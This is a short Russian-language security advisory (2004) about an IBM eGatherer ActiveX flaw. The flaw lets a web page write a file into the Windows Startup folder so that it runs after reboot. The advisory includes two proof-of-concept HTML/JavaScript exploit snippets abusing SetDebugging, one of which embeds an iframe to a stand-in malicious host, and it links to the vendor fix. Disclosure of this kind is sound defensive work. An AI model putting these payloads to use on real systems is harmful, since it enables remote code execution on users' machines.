Security Lab

Выполнение произвольного кода в eGatherer Activex

Дата публикации:17.06.2004
Всего просмотров:1222
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: eGatherer Activex 2.0.0.16

Описание: Обнаружена уязвимость в eGatherer Activex компоненте. Удаленный атакующий может создать файл в директории «Автозагрузка», который будет выполнен после перезагрузки системы с привилегиями текущего пользователя.

Удаленный атакующий может создать HTML страницу, которая запишет злонамеренный файл в папку Автозагрузка. Уязвимые методы: SetDebugging" и"RunEgatherer".

Пример/Эксплоит :
-----------Пример 1 ---------
<object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X">
</object>

<script>
X.SetDebugging("/../xx.hta",-1);
</script>
---------------------------------

-----------Пример 2 --------
<object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X">
</object>

<script>
X.SetDebugging("/../x<iframe src=http://www.malware.com>x.hta",-1);
</script>
---------------------------------

URL производителя: http://www.ibm.com/

Решение: Установите обновление:
http://www.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860

Ссылки: (eGatherer) Activex Dangerous Methods Vulnerability